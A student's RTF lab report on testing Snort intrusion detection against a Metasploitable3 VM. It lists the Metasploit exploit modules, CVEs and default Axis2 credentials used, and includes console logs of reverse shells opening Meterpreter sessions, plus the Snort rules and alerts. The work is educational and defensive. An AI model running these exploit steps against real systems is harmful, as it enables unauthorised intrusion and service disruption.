{\rtf1\ansi\deff3\adeflang1025
{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset0 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset0 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset0 Monaco;}{\f6\fnil\fprq0\fcharset2 OpenSymbol{\*\falt Arial Unicode MS};}{\f7\fnil\fprq0\fcharset0 apple-system{\*\falt system-ui};}{\f8\fnil\fprq2\fcharset128 Andale Mono;}{\f9\fswiss\fprq2\fcharset128 Arial;}{\f10\fnil\fprq0\fcharset0 Roboto{\*\falt sans-serif};}{\f11\fnil\fprq2\fcharset0 Arial Unicode MS;}}
{\colortbl;\red0\green0\blue0;\red0\green0\blue255;\red0\green255\blue255;\red0\green255\blue0;\red255\green0\blue255;\red255\green0\blue0;\red255\green255\blue0;\red255\green255\blue255;\red0\green0\blue128;\red0\green128\blue128;\red0\green128\blue0;\red128\green0\blue128;\red128\green0\blue0;\red128\green128\blue0;\red128\green128\blue128;\red192\green192\blue192;\red242\green242\blue242;\red180\green36\blue25;\red36\green41\blue46;\red64\green11\blue217;\red102\green113\blue133;}
{\stylesheet{\s0\snext0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057 Normal;}
{\s1\sbasedon17\snext1\sb240\sa120\keepn\dbch\af11\dbch\af11\afs28\loch\f4\fs28 Heading 1;}
{\s3\sbasedon17\snext3\sb240\sa120\keepn\dbch\af11\dbch\af11\afs28\loch\f4\fs28 Heading 3;}
{\*\cs15\snext15\cf9\ul\ulc0\langfe255\alang255\lang255 Internet Link;}
{\*\cs16\snext16\dbch\af6\dbch\af6\loch\f6 Bullets;}
{\s17\sbasedon0\snext18\sb240\sa120\keepn\dbch\af11\dbch\af11\afs28\loch\f4\fs28 Heading;}
{\s18\sbasedon0\snext18\sl288\slmult1\sb0\sa140 Text Body;}
{\s19\sbasedon18\snext19\sl288\slmult1\sb0\sa140 List;}
{\s20\sbasedon0\snext20\sb120\sa120\noline\i\afs24\ai\fs24 Caption;}
{\s21\sbasedon0\snext21\noline Index;}
}{\*\generator LibreOffice/5.0.3.2$MacOSX_X86_64 LibreOffice_project/e5f16313668ac592c1bfb310f4390624e3dbfb75}{\info{\creatim\yr2018\mo3\dy4\hr20\min33}{\revtim\yr2018\mo3\dy4\hr22\min45}{\printim\yr0\mo0\dy0\hr0\min0}}\deftab720
\viewscale85
{\*\pgdsctbl
{\pgdsc0\pgdscuse451\pgwsxn11906\pghsxn16838\marglsxn1134\margrsxn1134\margtsxn1134\margbsxn1134\pgdscnxt0 Default Style;}}
\formshade\paperh16838\paperw11906\margl1134\margr1134\margt1134\margb1134\sectd\sbknone\sectunlocked1\pgndec\pgwsxn11906\pghsxn16838\marglsxn1134\margrsxn1134\margtsxn1134\margbsxn1134\ftnbj\ftnstart1\ftnrstcont\ftnnar\aenddoc\aftnrstcont\aftnstart1\aftnnrlc
{\*\ftnsep\chftnsep}\pgndec\pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
I started the assignment by installing the virtual machine using vagrant. This took a long time and required some tricks to make it work, such as manually downloading a jdk file that the system failed to download. Fortunately the solution was found from a bug report in github. Next, I installed Snort to the virtual machine. The configuration was rather complicated, but some web pages and YouTube videos (for example this: }{{\field{\*\fldinst HYPERLINK "https://www.youtube.com/watch?v=l2w-fbyy6y0" }{\fldrslt {\cf9\ul\ulc0\langfe255\alang255\lang255\afs21\rtlch \ltrch\loch\fs21\loch\f9
https://www.youtube.com/watch?v=l2w-fbyy6y0}{}}}\afs21\rtlch \ltrch\loch\fs21\loch\f9
 and this: }{{\field{\*\fldinst HYPERLINK "https://www.youtube.com/watch?v=wXFVLXIsZdA" }{\fldrslt {\cf9\ul\ulc0\langfe255\alang255\lang255\afs21\rtlch \ltrch\loch\fs21\loch\f9
https://www.youtube.com/watch?v=wXFVLXIsZdA}{}}}\afs21\rtlch \ltrch\loch\fs21\loch\f9
) helped. Also, it took a while to notice that by default all the rules in the downloaded community.rules file were commented out by default, which was a bit annoying. In addition to the community rules, I downloaded the registered user rules. Installing metasploit to the machine hosting the VM was more straightforward and I didn't encounter any problems there. }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
The to the attacks. I will first describe attacks that were detected by Snort, either by the downloaded (and uncommented rules) or by some additional configuration tweaking. And then I will describe attacks that were not detected at least by the rules that were in use. However what Snort detects and doesn't detect really depends largely on the configurations, so maybe it would be possible to configure rules for the undetected attacks, but I didn't try to add any extra rules in addition to those either directly in downloaded rules files, or those I removed from comments. }{\afs21\rtlch \ltrch\loch\fs21\loch\f9
Apologies that the rest of this report is probably very difficult to read without line breaks as it contains copy-paste from command console and metasploit shell.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
First attack was a port scan, which I tried both with nmap and with the port scanner implemented during the course. This was detected after making the following change to the snort.conf file (described in the second YouTube file described above): }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
<-- # Portscan detection.  For more information, see README.sfportscan}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
preprocessor sfportscan: proto  \{ all \} scan_type \{ portscan \} sense_level \{ medium \} --> }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
After this port scan was reported on the cmd prompt running Snort as:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
03/04-10:08:58.786817  [**] [122:5:1] (portscan) TCP Filtered Portscan [**] [Cla}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
ssification: Attempted Information Leak] [Priority: 2] \{PROTO:255\} 192.168.5.122}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\fs21\loch\f9
 }{\afs21\rtlch \ltrch\loch\fs21\loch\f9
-> 192.168.5.186}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
After properly taking community.rules to use some additional \uc2 \u8220\'81\'67attempted information leak\u8221\'81\'68 notifications were seen.\uc1 }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
Then I tried a brute force password scan attack using metasploitable module auxiliary/scanner/ssh/ssh_login. This was detected after commenting out the following rule from indicator_scan.rules:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"INDICATOR-SCAN SSH brute force login attempt"; flow:to_server,established,no_stream; content:"SSH-"; depth:4; detection_filter:track by_src, count 5, seconds 60; metadata:policy max-detect-ips drop, service ssh; reference:cve,2012-6066; reference:cve,2015-5600; classtype:misc-activity; sid:19559; rev:9;). Snort console }{\afs21\rtlch \ltrch\loch\fs21\loch\f9
detected this attack and showed it in console as:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
03/04-10:40:04.961430  [**] [1:19559:9] INDICATOR-SCAN SSH brute force login att}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
empt [**] [Classification: Misc activity] [Priority: 3] \{TCP\} 192.168.5.122:5631}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
3 -> 192.168.5.186:22}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
Next I tried some of the vulnerabilities listed in the Metasploitable3 wiki. }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
The vulnerability on ManageEngine (}{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
CVE-2015-8249) was successful but it was also detected by Snort.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
msf exploit(windows/http/manageengine_connectionid_write) > run}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Started reverse TCP handler on 192.168.5.122:4444 }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Creating JSP stager}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Uploading JSP stager PaAew.jsp...}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Executing stager...}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Sending stage (179779 bytes) to 192.168.5.186}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Meterpreter session 14 opened (192.168.5.122:4444 -> 192.168.5.186:51188) at 2018-03-04 21:03:10 +0200}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/PaAew.jsp' on the target}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
meterpreter > }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[+] Deleted ../webapps/DesktopCentral/jspf/PaAew.jsp}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
Snort detected it and displayed the following on the cmd console:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
03/04-10:25:08.880027  [**] [1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
source attempt [**] [Classification: Web Application Attack] [Priority: 1] \{TCP\}}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\fs21\loch\f9
 }{\afs21\rtlch \ltrch\loch\fs21\loch\f9
192.168.5.122:54295 -> 192.168.5.186:8020}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
SNMP vulnerability was succssfully run with module auxiliary/scanner/snmp/snmp_enum. }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
msf auxiliary(scanner/snmp/snmp_enum) > run}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
[-] 192.168.5.186 SNMP request timeout.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Scanned 1 of 1 hosts (100% complete)}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Auxiliary module execution completed}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
msf auxiliary(scanner/snmp/snmp_enum) > }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
This was detected by Snort as seen from this console output:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
03/04-12:28:08.222245  [**] [1:1411:19] PROTOCOL-SNMP public access udp [**] [Cl}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
assification: Attempted Information Leak] [Priority: 2] \{UDP\} 192.168.5.122:5235}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
9 -> 192.168.5.186:161}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
The Apache Struts vulnerability CVE-2016-3087 could be run with metasploit module exploit/multi/http/struts_dmi_rest_exec. This was successful and it opened a connection to the VM:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
msf exploit(multi/http/struts_dmi_rest_exec) > run}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Started reverse TCP handler on 172.28.128.1:4444 }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] 192.168.5.186:8282 - Uploading exploit to DpSU.jar, and executing it.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Sending stage (53859 bytes) to 172.28.128.3}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Meterpreter session 12 opened (172.28.128.1:4444 -> 172.28.128.3:51132) at 2018-03-04 20:58:44 +020 }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
meterpreter > }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
Snort did not detect this attack, nothing was seen in the console.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\afs21\rtlch \ltrch\loch\fs21\loch\f9
Axis2 (CVE-2010-0219) vulnerability was succesful with metasploit module }{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
exploit/multi/http/axis2_deployer:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
msf exploit(multi/http/axis2_deployer) > run}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Started reverse TCP handler on 192.168.5.122:4444 }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[+] http://192.168.5.186:8282/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[+] Successfully uploaded}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Polling to see if the service is ready}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Sending stage (53859 bytes) to 192.168.5.186}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Meterpreter session 18 opened (192.168.5.122:4444 -> 192.168.5.186:51269) at 2018-03-04 21:09:30 +0200}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[+] Deleted webapps/axis2/WEB-INF/services/xEIsuFid.jar}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
meterpreter > }
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
This was not detected by Snort in any way at least with my configuration.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
IIS }{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
CVE-2015-1635 }{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
vulnerability was run with auxiliary/dos/http/ms15_034_ulonglongadd. This seems to have run successfully:}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
msf auxiliary(dos/http/ms15_034_ulonglongadd) > run}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Scanned 1 of 1 hosts (100% complete)}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
[*] Auxiliary module execution completed}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
Snort did not detect this one either.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
Further undetected attacks were for example the ElasticSearch attack and Jenkins attack but I won't include details to save space.}
\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057\afs21\rtlch \ltrch\loch\fs21\loch\f9

